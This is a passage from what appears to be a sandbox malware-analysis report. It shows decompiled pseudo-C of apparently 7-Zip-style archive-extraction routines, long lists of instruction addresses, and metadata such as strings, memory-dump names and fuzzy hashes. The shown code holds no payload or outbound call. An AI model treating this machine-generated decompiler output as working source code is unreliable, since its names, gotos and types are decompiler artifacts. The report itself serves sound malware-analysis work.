															 *_t121 =  *(_t376 + 0x37) & 0x00000000;
															__eflags =  *_t121;
															L66:
															E003B421F(_t376 + 0x120,  *(_t376 + 0x108));
															_push(0x14);
															_t227 = E003B1E0C();
															__eflags = _t227;
															if(_t227 == 0) {
																_t227 = 0;
																__eflags = 0;
															} else {
																 *(_t227 + 4) =  *(_t227 + 4) & 0x00000000;
																 *_t227 = "L`?";
															}
															_t370 = _t376 + 0x128;
															 *_t370 = _t227;
															L00403CED(_t376 + 0x12c, _t227);
															_t229 =  *_t370;
															 *(_t229 + 0x10) =  *(_t229 + 0x10) & 0x00000000;
															 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t376 + 0x120));
															 *((intOrPtr*)(_t229 + 0xc)) =  *((intOrPtr*)(_t376 + 0x124));
															L00403CED( *((intOrPtr*)(_t379 + 8)),  *((intOrPtr*)(_t376 + 0x12c)));
															_t368 =  *(_t379 - 0x14);
															goto L90;
														}
														 *(_t376 + 0x37) = 1;
														goto L66;
													}
													__eflags = _t316 - 0x1000;
													if(_t316 >= 0x1000) {
														goto L70;
													}
													goto L60;
												} else {
													_push(_t379 - 0x28);
													_push( *0x42a394);
													_t378 = L003C3A05(_t376);
													 *((char*)(_t379 - 4)) = 1;
													__eflags = _t378 - _t276;
													if(_t378 == _t276) {
														__eflags = _t368 - _t276;
														L91:
														if(__eflags != 0) {
															_t198 =  *((intOrPtr*)( *_t368 + 8))(_t368);
														}
														L93:
														_t378 = 0;
														L94:
														E003B1E40(E003B1E40(_t198,  *((intOrPtr*)(_t379 - 0x28))),  *((intOrPtr*)(_t379 - 0x34)));
														_t186 = _t378;
														goto L95;
													}
													__eflags = _t368 - _t276;
													if(_t368 != _t276) {
														_t198 =  *((intOrPtr*)( *_t368 + 8))(_t368);
													}
													goto L94;
												}
											}
											__eflags =  *((char*)(_t376 + 0xb0));
											if( *((char*)(_t376 + 0xb0)) != 0) {
												goto L40;
											}
											__eflags =  *((char*)(_t376 + 0xb2));
											if( *((char*)(_t376 + 0xb2)) != 0) {
												goto L40;
											}
											_push(_t379 - 0xe);
											_push(_t379 - 0x44);
											_t198 = E003C2D11( *(_t379 - 0x14),  *((intOrPtr*)(_t379 - 0x18)));
											__eflags = _t198 - _t276;
											if(_t198 != _t276) {
												L20:
												_t378 = _t198;
												goto L94;
											}
											__eflags =  *((char*)(_t379 - 0xe));
											if( *((char*)(_t379 - 0xe)) == 0) {
												goto L40;
											}
											_t239 = E003C6789(_t376 + 0x1bc, _t379 - 0x44, _t276,  *((intOrPtr*)(_t376 + 0x1c0)));
											__eflags = _t239 - 0xffffffff;
											if(_t239 == 0xffffffff) {
												goto L40;
											}
											_t371 =  *((intOrPtr*)( *((intOrPtr*)(_t376 + 0x1c8)) + _t239 * 4));
											__eflags =  *((intOrPtr*)(_t371 + 4)) - _t276;
											if( *((intOrPtr*)(_t371 + 4)) != _t276) {
												_t240 = L003B5954( *((intOrPtr*)(_t379 - 0x28)),  *_t371);
												__eflags = _t240;
												if(_t240 != 0) {
													E003C5D3C(_t376);
													 *( *(_t379 + 0xc)) =  *( *(_t379 + 0xc)) & 0x00000000;
													E003B1E40(E003B1E40( *(_t379 + 0xc),  *((intOrPtr*)(_t379 - 0x28))),  *((intOrPtr*)(_t379 - 0x34)));
													_t186 = 0;
													goto L95;
												}
												_t245 = E003B7253();
												_push(_t371);
												_push(_t379 - 0x28);
												_push( *0x42a3a0);
												_push(_t245);
												_t198 = L003C3A9B(_t376, __eflags);
												__eflags = _t198 - _t276;
												if(_t198 == _t276) {
													goto L93;
												}
												goto L20;
											}
											E003B2F2F(_t371, _t379 - 0x28);
											goto L40;
										}
										 *(_t379 + 0xb) =  *(_t379 + 0xb) & 0x00000000;
										_t372 = _t376 + 0x1d4;
										_push(_t379 + 0xb);
										_push(_t372);
										_push(_t379 - 0x28);
										_t250 = L003C575A(_t376);
										_t282 = _t250;
										__eflags = _t282;
										if(_t282 == 0) {
											__eflags =  *(_t379 + 0xb);
											if( *(_t379 + 0xb) != 0) {
												__eflags =  *_t372;
												_t69 =  *_t372 == 0;
												__eflags = _t69;
												 *((char*)(_t376 + 0x39)) = _t250 & 0xffffff00 | _t69;
												E003C5D3C(_t376);
											}
											_t198 =  *(_t379 + 0xc);
											 *( *(_t379 + 0xc)) =  *( *(_t379 + 0xc)) & 0x00000000;
											goto L93;
										}
										E003B1E40(E003B1E40(_t250,  *((intOrPtr*)(_t379 - 0x28))),  *((intOrPtr*)(_t379 - 0x34)));
										_t186 = _t282;
										goto L95;
									}
									 *_t367 =  *_t367 & 0x00000000;
									goto L93;
								}
								_t367 =  *(_t379 + 0xc);
								_push(_t367);
								_push(_t379 - 0x28);
								_t198 = E003C44C4(_t376, __eflags); // executed
								__eflags = _t198 - _t276;
								if(_t198 == _t276) {
									__eflags =  *_t367;
									if( *_t367 != 0) {
										goto L93;
									}
									 *_t367 = 1;
									goto L24;
								}
								goto L20;
							}
							_t373 = _t376 + 0xc0;
							_t198 = E003B2F2F(_t376 + 0xc0, _t379 - 0x28);
							if( *(_t379 - 0xd) != 0) {
								_t198 = L003B5803( *_t373);
							}
							if( *((intOrPtr*)(_t376 + 0x1dc)) != _t276) {
								goto L23;
							} else {
								if( *(_t379 - 0xd) == 0) {
									_t198 = E003C5D3C(_t376);
								}
								goto L93;
							}
						}
						_t257 =  *((intOrPtr*)(_t376 + 0xb4));
						if(_t257 == 0xffffffff) {
							goto L12;
						}
						 *((intOrPtr*)(_t379 - 0x44)) = _t257;
						E003B2D47(_t379 - 0x40);
						_t374 = _t376 + 0x1e4;
						 *((char*)(_t379 - 4)) = 3;
						_t283 = E003C6614(_t376 + 0x1e4, _t379 - 0x44);
						 *((char*)(_t379 - 4)) = 1;
						E003B1E40(_t260,  *((intOrPtr*)(_t379 - 0x40)));
						if(_t260 != 0xffffffff) {
							E003B2F2F(_t379 - 0x28,  *((intOrPtr*)( *_t374 + _t283 * 4)) + 4);
							E003B1089(_t379 - 0x28, 0x3a);
							E003B2E5F(_t379 - 0x40,  *((intOrPtr*)( *_t374 + _t283 * 4)) + 4, _t376 + 0xa4);
							 *((char*)(_t379 - 4)) = 4;
							L003D1F97(_t379 - 0x40);
							_t271 = E003B3128(_t379 - 0x28,  *((intOrPtr*)( *_t374 + _t283 * 4)) + 4, _t379 - 0x40);
							 *((char*)(_t379 - 4)) = 1;
							E003B1E40(_t271,  *((intOrPtr*)(_t379 - 0x40)));
						}
						_t276 = 0;
						goto L12;
					}
					_t273 = E003B857D( *((intOrPtr*)(_t379 - 0x34)));
					_t388 = _t273;
					if(_t273 != 0) {
						goto L7;
					}
					goto L6;
				}
			}







































                                                                                                    0x003c47f5
                                                                                                    0x003c4803
                                                                                                    0x003c4805
                                                                                                    0x003c4808
                                                                                                    0x003c480d
                                                                                                    0x003c4811
                                                                                                    0x003c4e0c
                                                                                                    0x003c4e12
                                                                                                    0x003c4e1a
                                                                                                    0x003c4e1a
                                                                                                    0x003c4820
                                                                                                    0x003c4825
                                                                                                    0x003c482a
                                                                                                    0x003c4835
                                                                                                    0x003c483a
                                                                                                    0x003c483c
                                                                                                    0x00000000
                                                                                                    0x003c4842
                                                                                                    0x003c4844
                                                                                                    0x003c4849
                                                                                                    0x003c4852
                                                                                                    0x003c4857
                                                                                                    0x003c485a
                                                                                                    0x003c485d
                                                                                                    0x003c4861
                                                                                                    0x003c4861
                                                                                                    0x003c486d
                                                                                                    0x003c4876
                                                                                                    0x003c487a
                                                                                                    0x003c4888
                                                                                                    0x003c488e
                                                                                                    0x003c4892
                                                                                                    0x003c489b
                                                                                                    0x003c489f
                                                                                                    0x003c48a7
                                                                                                    0x003c48ab
                                                                                                    0x003c48b1
                                                                                                    0x003c48b8
                                                                                                    0x003c4952
                                                                                                    0x003c4959
                                                                                                    0x003c4997
                                                                                                    0x003c499b
                                                                                                    0x003c49c5
                                                                                                    0x003c49c5
                                                                                                    0x003c49c8
                                                                                                    0x003c49d2
                                                                                                    0x003c49d7
                                                                                                    0x003c49db
                                                                                                    0x003c49e5
                                                                                                    0x003c49eb
                                                                                                    0x003c4a47
                                                                                                    0x003c4a4d
                                                                                                    0x003c4ab6
                                                                                                    0x003c4ab6
                                                                                                    0x003c4ab8
                                                                                                    0x003c4abe
                                                                                                    0x003c4ac1
                                                                                                    0x003c4ac3
                                                                                                    0x003c4ac7
                                                                                                    0x003c4b2d
                                                                                                    0x003c4b2d
                                                                                                    0x003c4ac9
                                                                                                    0x003c4ad0
                                                                                                    0x003c4ad0
                                                                                                    0x003c4b2f
                                                                                                    0x003c4b31
                                                                                                    0x003c4b34
                                                                                                    0x003c4b38
                                                                                                    0x003c4b3e
                                                                                                    0x003c4b41
                                                                                                    0x003c4b46
                                                                                                    0x003c4b46
                                                                                                    0x003c4b51
                                                                                                    0x003c4b57
                                                                                                    0x003c4b5b
                                                                                                    0x003c4b60
                                                                                                    0x003c4b64
                                                                                                    0x003c4b6d
                                                                                                    0x003c4b72
                                                                                                    0x003c4b74
                                                                                                    0x003c4bab
                                                                                                    0x003c4bae
                                                                                                    0x003c4bb2
                                                                                                    0x003c4bb9
                                                                                                    0x003c4c93
                                                                                                    0x003c4c93
                                                                                                    0x003c4c97
                                                                                                    0x003c4d29
                                                                                                    0x003c4d29
                                                                                                    0x003c4d30
                                                                                                    0x003c4d32
                                                                                                    0x003c4d39
                                                                                                    0x003c4d41
                                                                                                    0x003c4d48
                                                                                                    0x003c4d59
                                                                                                    0x003c4d5c
                                                                                                    0x003c4d68
                                                                                                    0x003c4d6c
                                                                                                    0x003c4d74
                                                                                                    0x003c4d76
                                                                                                    0x003c4d81
                                                                                                    0x003c4d84
                                                                                                    0x003c4d84
                                                                                                    0x003c4d8c
                                                                                                    0x003c4d90
                                                                                                    0x003c4d95
                                                                                                    0x003c4d98
                                                                                                    0x003c4d39
                                                                                                    0x003c4d99
                                                                                                    0x003c4d9d
                                                                                                    0x003c4dcd
                                                                                                    0x003c4dd1
                                                                                                    0x003c4dd6
                                                                                                    0x003c4ddd
                                                                                                    0x003c4de2
                                                                                                    0x003c4de5
                                                                                                    0x003c4de9
                                                                                                    0x003c4dec
                                                                                                    0x00000000
                                                                                                    0x003c4d9f
                                                                                                    0x003c4db5
                                                                                                    0x003c4db7
                                                                                                    0x003c4db9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4dbb
                                                                                                    0x003c4dbb
                                                                                                    0x003c4dbd
                                                                                                    0x003c4dc1
                                                                                                    0x003c4dc6
                                                                                                    0x003c4dc6
                                                                                                    0x003c4dc9
                                                                                                    0x00000000
                                                                                                    0x003c4dc9
                                                                                                    0x003c4d9d
                                                                                                    0x003c4c9d
                                                                                                    0x003c4ca1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4ca7
                                                                                                    0x003c4ca9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4cab
                                                                                                    0x003c4cb1
                                                                                                    0x003c4cb7
                                                                                                    0x003c4cb9
                                                                                                    0x003c4cbf
                                                                                                    0x003c4cbf
                                                                                                    0x003c4cc5
                                                                                                    0x003c4cd6
                                                                                                    0x003c4cdb
                                                                                                    0x003c4cdd
                                                                                                    0x003c4ce0
                                                                                                    0x003c4cfd
                                                                                                    0x003c4d06
                                                                                                    0x003c4d0b
                                                                                                    0x003c4d0d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4d14
                                                                                                    0x003c4d15
                                                                                                    0x003c4d1f
                                                                                                    0x003c4d21
                                                                                                    0x003c4d23
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4d23
                                                                                                    0x003c4ce7
                                                                                                    0x003c4ce8
                                                                                                    0x003c4cf3
                                                                                                    0x003c4cf5
                                                                                                    0x003c4cf7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4cf7
                                                                                                    0x003c4cbb
                                                                                                    0x003c4cbd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4cbd
                                                                                                    0x003c4bbf
                                                                                                    0x003c4bc5
                                                                                                    0x003c4bcb
                                                                                                    0x003c4bcd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4bd3
                                                                                                    0x003c4bd5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4bdb
                                                                                                    0x003c4bdd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4be3
                                                                                                    0x003c4bed
                                                                                                    0x003c4bed
                                                                                                    0x003c4bf4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4c05
                                                                                                    0x003c4c0a
                                                                                                    0x003c4c12
                                                                                                    0x003c4c19
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4c1b
                                                                                                    0x003c4c22
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4c24
                                                                                                    0x003c4c24
                                                                                                    0x003c4c24
                                                                                                    0x003c4c28
                                                                                                    0x003c4c34
                                                                                                    0x003c4c39
                                                                                                    0x003c4c3b
                                                                                                    0x003c4c40
                                                                                                    0x003c4c43
                                                                                                    0x003c4c51
                                                                                                    0x003c4c51
                                                                                                    0x003c4c45
                                                                                                    0x003c4c45
                                                                                                    0x003c4c49
                                                                                                    0x003c4c49
                                                                                                    0x003c4c53
                                                                                                    0x003c4c62
                                                                                                    0x003c4c64
                                                                                                    0x003c4c69
                                                                                                    0x003c4c77
                                                                                                    0x003c4c7b
                                                                                                    0x003c4c7e
                                                                                                    0x003c4c86
                                                                                                    0x003c4c8b
                                                                                                    0x00000000
                                                                                                    0x003c4c8b
                                                                                                    0x003c4c0c
                                                                                                    0x00000000
                                                                                                    0x003c4c0c
                                                                                                    0x003c4be5
                                                                                                    0x003c4be7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4b76
                                                                                                    0x003c4b7b
                                                                                                    0x003c4b7c
                                                                                                    0x003c4b87
                                                                                                    0x003c4b89
                                                                                                    0x003c4b8d
                                                                                                    0x003c4b8f
                                                                                                    0x003c4ba4
                                                                                                    0x003c4dee
                                                                                                    0x003c4dee
                                                                                                    0x003c4df3
                                                                                                    0x003c4df3
                                                                                                    0x003c4df6
                                                                                                    0x003c4df6
                                                                                                    0x003c4df8
                                                                                                    0x003c4e03
                                                                                                    0x003c4e09
                                                                                                    0x00000000
                                                                                                    0x003c4e0b
                                                                                                    0x003c4b91
                                                                                                    0x003c4b93
                                                                                                    0x003c4b9c
                                                                                                    0x003c4b9c
                                                                                                    0x00000000
                                                                                                    0x003c4b93
                                                                                                    0x003c4b74
                                                                                                    0x003c4a4f
                                                                                                    0x003c4a56
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4a58
                                                                                                    0x003c4a5f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4a6a
                                                                                                    0x003c4a6e
                                                                                                    0x003c4a6f
                                                                                                    0x003c4a74
                                                                                                    0x003c4a76
                                                                                                    0x003c49b0
                                                                                                    0x003c49b0
                                                                                                    0x00000000
                                                                                                    0x003c49b0
                                                                                                    0x003c4a7c
                                                                                                    0x003c4a80
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4a93
                                                                                                    0x003c4a98
                                                                                                    0x003c4a9b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4aa3
                                                                                                    0x003c4aa6
                                                                                                    0x003c4aa9
                                                                                                    0x003c4ad9
                                                                                                    0x003c4ade
                                                                                                    0x003c4ae0
                                                                                                    0x003c4b09
                                                                                                    0x003c4b14
                                                                                                    0x003c4b1f
                                                                                                    0x003c4b25
                                                                                                    0x00000000
                                                                                                    0x003c4b27
                                                                                                    0x003c4ae2
                                                                                                    0x003c4aea
                                                                                                    0x003c4aeb
                                                                                                    0x003c4aee
                                                                                                    0x003c4af4
                                                                                                    0x003c4af5
                                                                                                    0x003c4afa
                                                                                                    0x003c4afc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4b02
                                                                                                    0x003c4ab1
                                                                                                    0x00000000
                                                                                                    0x003c4ab1
                                                                                                    0x003c49ed
                                                                                                    0x003c49f4
                                                                                                    0x003c49fa
                                                                                                    0x003c49fe
                                                                                                    0x003c49ff
                                                                                                    0x003c4a02
                                                                                                    0x003c4a07
                                                                                                    0x003c4a09
                                                                                                    0x003c4a0b
                                                                                                    0x003c4a26
                                                                                                    0x003c4a2a
                                                                                                    0x003c4a2c
                                                                                                    0x003c4a31
                                                                                                    0x003c4a31
                                                                                                    0x003c4a34
                                                                                                    0x003c4a37
                                                                                                    0x003c4a37
                                                                                                    0x003c4a3c
                                                                                                    0x003c4a3f
                                                                                                    0x00000000
                                                                                                    0x003c4a3f
                                                                                                    0x003c4a18
                                                                                                    0x003c4a1e
                                                                                                    0x00000000
                                                                                                    0x003c4a20
                                                                                                    0x003c49dd
                                                                                                    0x00000000
                                                                                                    0x003c49dd
                                                                                                    0x003c499d
                                                                                                    0x003c49a3
                                                                                                    0x003c49a4
                                                                                                    0x003c49a7
                                                                                                    0x003c49ac
                                                                                                    0x003c49ae
                                                                                                    0x003c49b7
                                                                                                    0x003c49ba
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c49c0
                                                                                                    0x00000000
                                                                                                    0x003c49c0
                                                                                                    0x00000000
                                                                                                    0x003c49ae
                                                                                                    0x003c495b
                                                                                                    0x003c4967
                                                                                                    0x003c4970
                                                                                                    0x003c4974
                                                                                                    0x003c4974
                                                                                                    0x003c497f
                                                                                                    0x00000000
                                                                                                    0x003c4981
                                                                                                    0x003c4985
                                                                                                    0x003c498d
                                                                                                    0x003c498d
                                                                                                    0x00000000
                                                                                                    0x003c4985
                                                                                                    0x003c497f
                                                                                                    0x003c48be
                                                                                                    0x003c48c7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c48d0
                                                                                                    0x003c48d3
                                                                                                    0x003c48d8
                                                                                                    0x003c48e4
                                                                                                    0x003c48f0
                                                                                                    0x003c48f2
                                                                                                    0x003c48f6
                                                                                                    0x003c48ff
                                                                                                    0x003c490d
                                                                                                    0x003c4917
                                                                                                    0x003c4926
                                                                                                    0x003c492e
                                                                                                    0x003c4932
                                                                                                    0x003c493e
                                                                                                    0x003c4946
                                                                                                    0x003c494a
                                                                                                    0x003c494f
                                                                                                    0x003c4950
                                                                                                    0x00000000
                                                                                                    0x003c4950
                                                                                                    0x003c487f
                                                                                                    0x003c4884
                                                                                                    0x003c4886
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c4886

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003C47F5
                                                                                                      • Part of subcall function 003C40C6: __EH_prolog.LIBCMT ref: 003C40CB
                                                                                                      • Part of subcall function 003C4236: __EH_prolog.LIBCMT ref: 003C423B
                                                                                                      • Part of subcall function 003D234E: __EH_prolog.LIBCMT ref: 003D2353
                                                                                                      • Part of subcall function 003C43C7: __EH_prolog.LIBCMT ref: 003C43CC
                                                                                                      • Part of subcall function 003C44C4: __EH_prolog.LIBCMT ref: 003C44C9
                                                                                                    Strings
                                                                                                    • Cannot seek to begin of file, xrefs: 003C4D15
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: Cannot seek to begin of file
                                                                                                    • API String ID: 3519838083-2298593816
                                                                                                    • Opcode ID: 395ad182e21433b12113e46f7d1d7957339306b2c9256f0b78f7c9e558e0fbd2
                                                                                                    • Instruction ID: 05c9af45699d7566678b8d7dcfe61c340a1a4ac7fe4f1b48bc971f2973734077
                                                                                                    • Opcode Fuzzy Hash: 395ad182e21433b12113e46f7d1d7957339306b2c9256f0b78f7c9e558e0fbd2
                                                                                                    • Instruction Fuzzy Hash: B4120F319043499FDB27EBA4C4A4FEEBBF5AF05304F04445DE596AB292CB30AE84CB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D193F Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 388COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 96%
                                                                                                    			E003D193F(signed int __ecx, intOrPtr* __edx, void* __eflags) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t186;
				void* _t194;
				void* _t195;
				void* _t197;
				signed int _t203;
				intOrPtr* _t213;
				signed int _t215;
				signed int _t217;
				signed int _t228;
				intOrPtr* _t237;
				signed int _t243;
				signed int _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t252;
				intOrPtr _t256;
				intOrPtr* _t270;
				intOrPtr _t316;
				intOrPtr* _t334;
				signed int _t336;
				intOrPtr _t338;
				intOrPtr _t339;
				intOrPtr* _t342;
				signed int _t343;
				intOrPtr* _t345;
				intOrPtr* _t346;
				void* _t347;
				void* _t353;
				void* _t357;

				_t353 = __eflags;
				E0041F1B0(E00424A73, _t347);
				_t334 = __edx;
				 *(_t347 - 0x18) = __ecx;
				_t186 =  *((intOrPtr*)( *__edx +  *(__edx + 4) * 4 - 4));
				_t270 =  *((intOrPtr*)(_t347 + 0x2c));
				 *((intOrPtr*)(_t347 - 0x14)) = _t186;
				 *_t270 = 0;
				 *((intOrPtr*)(_t270 + 4)) = 0;
				 *((intOrPtr*)(_t347 - 0x24)) = 0;
				 *((intOrPtr*)(_t347 - 0x28)) =  *_t186;
				 *(_t347 - 0x20) = 0;
				 *((intOrPtr*)(_t347 - 0x1c)) = 0;
				 *((intOrPtr*)(_t347 - 4)) = 0;
				E003FD423(_t347 - 0x58);
				_t342 =  *((intOrPtr*)(_t347 + 0x14));
				 *((char*)(_t347 - 4)) = 1;
				_t18 = _t342 + 0x14; // 0x80004018
				E003B2E5F(_t347 - 0x34, _t353, _t18);
				 *((char*)(_t347 - 4)) = 2;
				E003B2E5F(_t347 - 0x74, _t353,  *((intOrPtr*)(_t347 - 0x14)) + 0x30);
				 *((char*)(_t347 - 4)) = 3;
				if( *((intOrPtr*)(_t334 + 4)) > 1) {
					_t339 =  *((intOrPtr*)( *_t334));
					_t260 =  *(_t339 + 0x3c);
					if( *(_t339 + 0x3c) >= 0 && E003B2407( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t347 - 0x18) + 8)) + _t260 * 4)) + 0x10)), "pe") != 0) {
						_t357 = _t339 + 0x30;
						E003B2F2F(_t347 - 0x74, _t339 + 0x30);
					}
				}
				_t323 = _t347 - 0x74;
				_t194 = L003D1FFE(_t347 - 0x64, _t347 - 0x74, _t357);
				 *((char*)(_t347 - 4)) = 4;
				_t195 = E003B2DCD(_t347 - 0x4c, 0x429390);
				 *((char*)(_t347 - 4)) = 5;
				_t197 = E003B1E40(E003B341A(_t347 - 0x34, _t195, _t194),  *((intOrPtr*)(_t347 - 0x4c)));
				 *((char*)(_t347 - 4)) = 3;
				E003B1E40(_t197,  *((intOrPtr*)(_t347 - 0x64)));
				 *(_t347 + 0x17) = 0;
				E003B2D47(_t347 - 0x40);
				 *((char*)(_t347 - 4)) = 6;
				E003B2E5F(_t347 - 0x80, _t357, _t347 - 0x34);
				 *((char*)(_t347 - 4)) = 7;
				if( *_t342 != 0 &&  *((intOrPtr*)(_t342 + 8)) != 3) {
					E003B2D47(_t347 - 0x4c);
					 *((char*)(_t347 - 4)) = 8;
					_t256 = E003B4431(_t347 - 0x34, _t347 - 0x4c, _t347 - 0x40);
					_t323 =  *(_t347 - 0x3c);
					if(_t323 != 0) {
						_t256 =  *((intOrPtr*)(_t347 - 0x40));
						_t316 =  *((intOrPtr*)(_t256 + _t323 * 2 - 2));
						if(_t316 == 0x5c || _t316 == 0x2f) {
							_t323 = _t323 - 1;
							 *(_t347 - 0x3c) = _t323;
							 *((short*)(_t256 + _t323 * 2)) = 0;
						}
						if( *(_t347 - 0x3c) != 0) {
							_t256 = E003B2F2F(_t347 - 0x80, _t347 - 0x4c);
							 *(_t347 + 0x17) = 1;
						}
					}
					 *((char*)(_t347 - 4)) = 7;
					E003B1E40(_t256,  *((intOrPtr*)(_t347 - 0x4c)));
				}
				 *(_t347 - 0xd) = E003B468F(0,  *(_t347 + 0x10), _t323, _t342);
				if( *(_t342 + 0x3c) != 0) {
					L48:
					__eflags =  *(_t347 + 0x17);
					if( *(_t347 + 0x17) != 0) {
						E003EF23F(_t347 - 0x58);
						_push(_t347 - 0x40);
						E003B1524(_t347 - 0x58);
					}
					__eflags =  *(_t347 - 0x30);
					if(__eflags != 0) {
						_t203 = E003B5AE6( *((intOrPtr*)(_t347 - 0x34)), __eflags); // executed
						__eflags = _t203;
						if(__eflags != 0) {
							goto L52;
						}
						_t343 = E003B7253();
						_push( *((intOrPtr*)(_t347 + 0x28)));
						_push(_t343);
						_t217 = L003D18D0("Cannot create output directory", _t347 - 0x34, __eflags);
						goto L73;
					} else {
						E003B302D(_t347 - 0x34, 0x4293f4);
						L52:
						_t336 =  *(_t347 + 0x24);
						asm("sbb eax, eax");
						_t136 = _t342 + 0x20; // 0x80004024
						E003C3404(_t336, __eflags, _t136,  ~( *(_t342 + 0x3c)) &  *(_t347 + 0x10),  *((intOrPtr*)(_t347 - 0x14)),  *((intOrPtr*)(_t347 + 0x20)),  *((intOrPtr*)(_t342 + 0x3d)),  *(_t342 + 0x3f), _t347 - 0x34, _t347 - 0x58, 0,  *((intOrPtr*)(_t347 + 8)),  *((intOrPtr*)(_t347 + 0xc)));
						__eflags =  *(_t342 + 0x3c);
						if( *(_t342 + 0x3c) != 0) {
							L56:
							__eflags =  *(_t342 + 0x3f);
							if( *(_t342 + 0x3f) == 0) {
								L61:
								__eflags = 0;
								L62:
								 *(_t347 + 0x10) = _t336;
								__eflags =  *(_t342 + 0x3c);
								 *((char*)(_t347 - 4)) = 0xa;
								if( *(_t342 + 0x3c) == 0) {
									_t213 =  *((intOrPtr*)(_t347 - 0x28));
									 *(_t347 + 0x18) =  *((intOrPtr*)( *_t213 + 0x1c))(_t213,  *((intOrPtr*)(_t347 - 0x24)),  *(_t347 - 0x20), 0, _t336);
								} else {
									_t345 =  *((intOrPtr*)(_t347 - 0x28));
									 *(_t347 + 0x18) =  *((intOrPtr*)( *_t345 + 0x1c))(_t345, 0, 0xffffffff, 0, _t336);
									 *((short*)(_t347 - 0x68)) = 0;
									 *((short*)(_t347 - 0x66)) = 0;
									 *((intOrPtr*)(_t347 - 0x60)) = 0;
									 *((char*)(_t347 - 4)) = 0xb;
									_t228 =  *((intOrPtr*)( *_t345 + 0x20))(_t345, 0x2c, _t347 - 0x68);
									__eflags = _t228;
									if(_t228 == 0) {
										E003C2DE8(_t347 - 0x68,  *((intOrPtr*)(_t347 + 0x2c)));
									}
									 *((char*)(_t347 - 4)) = 0xa;
									E003B92C9(_t347 - 0x68);
								}
								_t215 = 0;
								__eflags = _t336;
								if(__eflags != 0) {
									_t215 = E003C642E(_t336, __eflags);
									 *(_t347 + 0x10) = 0;
								}
								__eflags =  *(_t347 + 0x18);
								if( *(_t347 + 0x18) == 0) {
									 *(_t347 + 0x18) = _t215;
								}
								_t217 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t347 + 0x1c)))) + 0xc))( *(_t347 + 0x18));
								_t286 =  *(_t347 + 0x10);
								_t343 = _t217;
								__eflags =  *(_t347 + 0x10);
								 *((char*)(_t347 - 4)) = 7;
								if(__eflags != 0) {
									_t217 = E003C642E(_t286, __eflags);
								}
								goto L73;
							}
							L57:
							__eflags =  *(_t347 + 0x18);
							if( *(_t347 + 0x18) != 0) {
								goto L61;
							}
							_push(1);
							_pop(0);
							goto L62;
						}
						__eflags =  *(_t342 + 0x3f);
						if( *(_t342 + 0x3f) != 0) {
							goto L57;
						}
						__eflags =  *(_t342 + 0x26);
						if(__eflags == 0) {
							goto L56;
						}
						_t217 = E003C2B58(_t336, __eflags, _t347 - 0x24);
						__eflags = _t217;
						if(_t217 != 0) {
							goto L15;
						}
						goto L56;
					}
				} else {
					_t237 =  *((intOrPtr*)(_t347 - 0x28));
					_t217 =  *((intOrPtr*)( *_t237 + 0x14))(_t237, _t347 - 0x18);
					if(_t217 == 0) {
						E003C3007(_t347 - 0xc0, __eflags);
						_t338 = 0;
						__eflags =  *(_t347 - 0x18);
						 *((char*)(_t347 - 4)) = 9;
						if( *(_t347 - 0x18) <= 0) {
							L44:
							__eflags =  *(_t347 - 0x20);
							if( *(_t347 - 0x20) != 0) {
								 *((char*)(_t347 - 4)) = 7;
								E003C332F(_t347 - 0xc0);
								goto L48;
							}
							_t346 =  *((intOrPtr*)(_t347 + 0x1c));
							 *((intOrPtr*)( *_t346 + 8))();
							_t243 =  *((intOrPtr*)( *_t346 + 0xc))(0);
							L46:
							_t343 = _t243;
